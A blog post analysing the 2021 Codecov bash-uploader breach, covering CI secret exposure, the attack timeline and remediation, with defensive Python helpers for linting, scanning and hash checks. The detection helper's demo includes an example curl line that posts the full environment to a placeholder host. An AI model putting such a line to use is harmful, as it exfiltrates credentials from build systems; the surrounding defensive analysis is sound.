Pipeline Composition Analysis: How your CI pipeline presents new opportunities for attackers

The case of the Codecov hack

Eylam Milner
Apr 18, 2021

It’s pretty amazing to consider the level of trust we put in lines like these -

Well, specifically the second line, which is at the center of an ongoing investigation into the Codecov breach that became public on 15th April 2021.

These instructions are how modern CI pipelines are constructed: they chain together building blocks (called actions, tasks, or orbs, depending on the platform) that take raw source code, run a series of tests, validations, and compilation tasks, and produce a final artifact as output.

Oh, and these building blocks are just external code projects. Written by anyone, published for everyone. Consuming one is as easy as installing an app from a marketplace, and looks something like this -

Using someone else’s code in your application is not a new concept. Open source has been mainstream for years, so why is this an issue? Because it has now become extremely easy to run external code as part of the software release process. These are no longer just your application’s dependencies, but your pipeline’s dependencies. External code running in your CI has access to your entire code project, the infrastructure it runs on, and the environment set up for it (including sensitive data such as API keys, credentials, and access tokens).
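To make the point about environment access concrete, here is a minimal Python sketch (not how any particular CI platform is implemented) that treats a pipeline step as a child process. By default a child process inherits every environment variable of its parent, so a step sees any secret the job exposes unless it is explicitly handed a reduced environment. `FAKE_API_TOKEN`, `run_step`, and the step code are all hypothetical.

```python
import os
import subprocess
import sys


def run_step(code: str, env=None) -> str:
    """Run a stand-in "third-party step" in a child process and return its stdout."""
    completed = subprocess.run(
        [sys.executable, "-c", code],
        env=env,  # env=None: the child inherits the parent's full environment
        capture_output=True,
        text=True,
        check=True,
    )
    return completed.stdout.strip()


# A made-up secret standing in for a real CI credential.
os.environ["FAKE_API_TOKEN"] = "s3cr3t-example"

# The hypothetical external step simply reads whatever environment it was given.
STEP = "import os; print(os.environ.get('FAKE_API_TOKEN', '<not visible>'))"

inherited = run_step(STEP)  # default behaviour: the secret is visible
restricted = run_step(STEP, env={"PATH": os.environ.get("PATH", "")})  # allow-list only
print(inherited)
print(restricted)
```

The first call prints the token and the second prints `<not visible>`. Where your CI platform exposes secrets to the whole job, every step you add should be treated as having access to all of them.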

Sounds like something that could be taken advantage of? Well, it is, and it was.

So what happened in the Codecov hack?

First, an important note: at the time of writing, the exact details of what happened and how are still not fully known, so I’ll outline the events as Codecov itself has described them.

For people in a hurry

  1. An attacker gained access to Codecov’s private Google Cloud Storage, which hosted a script file used by many of their customers (either directly, by downloading it, or indirectly, through one of Codecov’s ready-made CI steps).
  2. The attacker then added a single new line to it, which sends out the sensitive information available in the customer’s CI environment whenever the script runs.
  3. Every company using this script (an essential part of the Codecov solution) potentially sent credentials, access tokens, API keys, and more to the attacker, and must now revoke and replace them.

To be more specific

Codecov’s Google Cloud Storage key was leaked through the Codecov Docker image. How exactly has yet to be revealed, but there are some very common ways engineers make this possible, e.g. leaving the key in plain text in the Dockerfile, passing sensitive values with the ARG instruction, or misconfiguring .dockerignore and accidentally copying unwanted files like .env into the image.
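Since the actual root cause hasn’t been disclosed, the following is only a rough sketch of how one might lint for the mistakes listed above. The keyword list, the function names, and the `.env` requirement are my own assumptions, and a regex over Dockerfile text is a heuristic, not a real secret scanner (it checks variable names only, so a secret hidden under an innocent name slips through). Docker’s own documentation warns against passing secrets as build-time variables, since their values can show up in the image history.

```python
from __future__ import annotations

import re

# Heuristic: name fragments that usually indicate a credential.
SENSITIVE = re.compile(r"KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL", re.IGNORECASE)


def lint_dockerfile(text: str) -> list[str]:
    """Flag ARG/ENV instructions whose variable name looks sensitive (values are never echoed)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        parts = line.strip().split(None, 1)
        if len(parts) < 2:
            continue
        instr, rest = parts[0].upper(), parts[1]  # Dockerfile instructions are case-insensitive
        if instr not in ("ARG", "ENV"):
            continue
        tokens = rest.split("=", 1)[0].split()  # handles both NAME=value and NAME value
        if tokens and SENSITIVE.search(tokens[0]):
            findings.append(f"line {lineno}: {instr} {tokens[0]}")
    return findings


def missing_ignores(dockerignore: str, required=(".env",)) -> list[str]:
    """Return required patterns that are absent from a .dockerignore file."""
    entries = {
        entry.strip()
        for entry in dockerignore.splitlines()
        if entry.strip() and not entry.strip().startswith("#")
    }
    return [pattern for pattern in required if pattern not in entries]
```

For example, a Dockerfile containing `ARG GCS_KEY` would be flagged on that line, and a `.dockerignore` that lists only `node_modules` would be reported as missing `.env`.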

Once it had access to GCP, the attacker altered a script named bash-uploader, which uploads the coverage reports generated in the customer’s CI to the Codecov platform.

The bash-uploader itself is a small utility that looks like this -

And the new line added by the attacker 🥁 -

What does it do? It sends the list of environment variables (which can be highly sensitive) to a remote URL where the attacker can access them.
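A crude way to spot this class of change in a script you are about to run is to flag any line that both calls a network client and embeds the output of `env`. The sketch below is a hypothetical heuristic of my own (names and patterns included), demonstrated on a harmless made-up script with a placeholder URL. An attacker can trivially obfuscate around it, so at best it complements integrity checks rather than replacing them.

```python
from __future__ import annotations

import re

# Hypothetical patterns: a network client, and command substitution of env/printenv.
NET = re.compile(r"\b(?:curl|wget|nc)\b")
ENV_DUMP = re.compile(r"\$\(\s*(?:env|printenv)\s*\)|`\s*(?:env|printenv)\s*`")


def suspicious_lines(script: str) -> list[tuple[int, str]]:
    """Return (line number, line) pairs that send environment output over the network."""
    hits = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        if NET.search(line) and ENV_DUMP.search(line):
            hits.append((lineno, line.strip()))
    return hits


demo = (
    'echo "uploading"\n'
    'curl -s -d "$(env)" https://example.invalid/collect\n'
    'curl -s -F "file=@coverage.xml" https://example.invalid/upload\n'
)
print(suspicious_lines(demo))
```

Only the second line of the demo is flagged; the legitimate-looking upload on the third line is not.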

From that point on, there are two ways to be affected by the attack: you either explicitly download and run the bash-uploader script, or you use one of Codecov’s ready-made steps (an action in GitHub, an orb in CircleCI, or a step in Bitrise), which run this script themselves.

And that’s it. Once any of those lines is added to a project’s pipeline, the project is exposed to any vulnerability these external dependencies bring with them.
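To check whether your own repositories go through either path, a quick text search of the CI configuration is a reasonable first pass. This is a minimal sketch: the reference patterns (the `codecov.io/bash` URL, the `codecov/codecov-action` action, the `codecov/codecov` orb, and a `codecov@` Bitrise step) and the candidate file locations are my assumptions about typical configs, so verify them against what your pipelines actually contain.

```python
from __future__ import annotations

import re
from pathlib import Path

# Assumed ways a config might pull in the bash-uploader, directly or via a wrapper step.
PATTERNS = {
    "bash uploader (direct download)": re.compile(r"codecov\.io/bash"),
    "GitHub Action": re.compile(r"codecov/codecov-action"),
    "CircleCI orb": re.compile(r"codecov/codecov@"),
    "Bitrise step": re.compile(r"^\s*-\s*codecov@", re.MULTILINE),
}

# Assumed locations of CI configuration and helper scripts in a repository.
CANDIDATE_FILES = (
    ".github/workflows/*.yml",
    ".github/workflows/*.yaml",
    ".circleci/config.yml",
    "bitrise.yml",
    "**/*.sh",
)


def find_codecov_usage(config_text: str) -> list[str]:
    """Return the names of all patterns that appear in a config file's text."""
    return [name for name, pattern in PATTERNS.items() if pattern.search(config_text)]


def scan_repo(root: str) -> dict[str, list[str]]:
    """Map each matching file under `root` to the kinds of Codecov usage found in it."""
    results = {}
    for glob_pattern in CANDIDATE_FILES:
        for path in Path(root).glob(glob_pattern):
            if path.is_file():
                hits = find_codecov_usage(path.read_text(errors="ignore"))
                if hits:
                    results[str(path)] = hits
    return results
```

Calling `scan_repo(".")` from a repository root returns an empty dict when none of the assumed patterns appear.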

Now, those of you who read the statement by Codecov’s CEO might have noticed this:

Our investigation has determined that beginning January 31, 2021, there were periodic, unauthorized alterations of our Bash Uploader script by a third party, which enabled them to potentially export information stored in our users’ continuous integration (CI) environments.

The first time I read this, I was kinda thrown off. What’s with the periodic alterations? So I did a little digging. Codecov stated the file was maliciously altered on January 31, 2021, and the foul play was only discovered on April 1st (which must have been a hoot). That means there was probably some work done in the two months in between, right? Changes committed to the bash-uploader script?

The GitHub page of the project shows this was indeed the case -

Changes were pushed to the bash-uploader file (elegantly named codecov), and some of them have a green checkmark next to them, indicating a successful build.

This means the build job (here, CircleCI) created a new version of the bash-uploader file, one without the malicious alteration, and successfully pushed it to the official location Codecov customers download it from (https://codecov.io/bash).

Here is where this magic happens -

.circleci/config.yml - uploading the new version of the `codecov` util

Well, there we have it. Any successful release of the codecov-bash project should have overwritten the attacker’s changes to the uploader util. Unless 🤔… the malicious line was added again and again: every time a new version of the codecov util was uploaded, it was re-altered to send out sensitive information. Hence, “periodic”.

Consequences

The results of this incident are still unfolding. For now, we know that projects that used the codecov-bash dependency in their pipeline, one way or another, between January 31, 2021 and April 1, 2021 are potentially at risk. A very rough (and in no way official!) estimate shows close to 15,000 files using the bash-uploader script across hundreds of different open-source projects today.

Some high-profile projects are on that list, such as argo-cd, ansible, webpack, K8S, and more. Now, this DOES NOT mean they are compromised; it does mean they use Codecov and have been using the bash-uploader.
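If you have a record of when your pipelines ran the uploader, checking it against the exposure window is simple date arithmetic. In this sketch the window bounds are Codecov’s dates as quoted in this post, treated as inclusive to err on the cautious side; the build dates are made up, and in practice you would pull them from your CI platform’s build history.

```python
from datetime import date

# Exposure window per Codecov's timeline (inclusive on both ends, to be cautious).
WINDOW_START = date(2021, 1, 31)
WINDOW_END = date(2021, 4, 1)


def in_exposure_window(build_day: date) -> bool:
    """True if a build that ran the bash-uploader on this day may have leaked its environment."""
    return WINDOW_START <= build_day <= WINDOW_END


# Hypothetical build history for one project.
builds = [date(2021, 1, 15), date(2021, 2, 10), date(2021, 4, 1), date(2021, 4, 20)]
flagged = [day for day in builds if in_exposure_window(day)]

print((WINDOW_END - WINDOW_START).days)  # 60
print(flagged)
```

The window spans 60 days, and two of the four sample builds (February 10 and April 1) fall inside it.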

Remediation

Since this is an ongoing event, I’ll separate the remediation aspect into recovery, and prevention.

Recovery

If you think you are in any way affected by this event, Codecov’s official instruction is to:

“… immediately re-roll all of their credentials, tokens, or keys located in the environment variables in their CI processes that used one of Codecov’s Bash Uploaders.”

In practice, this means going to the secrets tab of your CI platform, revoking the existing sensitive data you don’t want anyone outside your company to ever see (manually, or through the API on platforms that allow it), and generating new values to replace them.
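Codecov’s instruction covers every credential in the CI environment, so the safest course is to rotate all of them. If you need a starting inventory, a sketch like this one lists the names of environment variables that look like secrets, without ever printing their values. The name patterns and the function name are my own assumptions, so anything the heuristic misses still needs rotating.

```python
from __future__ import annotations

import os
import re

# Heuristic only: name fragments that commonly indicate credentials.
SECRET_NAME = re.compile(
    r"TOKEN|SECRET|PASSWORD|PASSWD|API_?KEY|ACCESS_?KEY|PRIVATE_?KEY|CREDENTIAL",
    re.IGNORECASE,
)


def rotation_checklist(env=None) -> list[str]:
    """Return the sorted names (never the values) of variables that look like secrets."""
    env = os.environ if env is None else env
    return sorted(name for name in env if SECRET_NAME.search(name))


if __name__ == "__main__":
    # Run inside a CI job to list candidate variable names for rotation.
    for name in rotation_checklist():
        print(name)
```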

On top of that, there is a simple integrity check to test the authenticity of the bash-uploader script before actually using it. It’s optional, though you should probably treat it as mandatory.

Instead of simply pulling the script and running it, you also pull its published hash value (calculated for you by Codecov), compute the hash of the script you downloaded, and compare the two. This is how the incident came to light in the first place: one of Codecov’s customers noticed the hash mismatch.
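Here is a minimal sketch of that check in Python, assuming a SHA-256 digest is published in the common `sha256sum` output format (adjust `algorithm` if the vendor publishes a different hash). The helper names are hypothetical, and the demo uses made-up bytes rather than a real download.

```python
import hashlib
import hmac
import urllib.request


def fetch(url: str) -> bytes:
    """Download a file (for example, the uploader script) and return its raw bytes."""
    with urllib.request.urlopen(url, timeout=30) as response:
        return response.read()


def parse_checksum_line(line: str) -> str:
    """Extract the digest from a line in `sha256sum` format: '<hex digest>  <filename>'."""
    return line.split()[0].lower()


def verify_script(script: bytes, expected_hex: str, algorithm: str = "sha256") -> bool:
    """Hash the downloaded bytes and compare the result to the published digest."""
    actual = hashlib.new(algorithm, script).hexdigest()
    return hmac.compare_digest(actual, expected_hex.strip().lower())


# Offline demo with made-up content instead of a real download:
original = b"#!/usr/bin/env bash\necho 'uploading coverage'\n"
published = hashlib.sha256(original).hexdigest()  # what the vendor would publish
tampered = original + b"# one extra line\n"

print(verify_script(original, published))  # True
print(verify_script(tampered, published))  # False
```

In a pipeline you would run the script only when the check passes and fail the job otherwise. If the script and its checksum are hosted in the same place, an attacker who can modify one can likely modify both, so fetching the checksum from a separate source makes the check far more meaningful.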

Prevention

CI/CD pipelines (and DevOps infrastructure in general) are a technological engine. They allow software to be built, tested, and delivered faster than ever, pushing the development community forward, and integrating community-powered code into private software delivery pipelines is a big part of that. It should not, however, come at the cost of security. We should start treating our complex pipelines as an integral part of our software and protect them accordingly.

Pipeline Composition Analysis means just that: map all the moving parts in your software delivery pipeline, know what you use, scan for vulnerabilities and misconfigurations, and respond quickly, or better yet, automatically.
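As a minimal sketch of the "know what you use" part, the following lists the third-party steps referenced by `uses:` in a GitHub Actions workflow and flags whether each one is pinned to a full 40-character commit SHA. The regex-based parsing and the function name are my own assumptions; a real tool would parse the YAML properly and cover other CI platforms too.

```python
from __future__ import annotations

import re

# Matches "uses: owner/repo@ref" entries, with or without a leading list dash.
USES = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.MULTILINE)
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")


def inventory(workflow_text: str) -> list[dict]:
    """List external steps in a workflow and whether each is pinned to a commit SHA."""
    items = []
    for ref in USES.findall(workflow_text):
        if ref.startswith("./"):
            continue  # local actions live in the same repository
        name, _, version = ref.partition("@")
        items.append({"step": name, "version": version, "pinned": bool(FULL_SHA.match(version))})
    return items
```

Keep in mind that pinning only fixes the code of the step itself. A step that downloads a script at runtime, as Codecov’s action did with the bash-uploader, is still exposed to whatever that URL serves.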

As this event unfolds, I’ll be sure to share more. In the meantime — good luck! And have a safe delivery 📦.
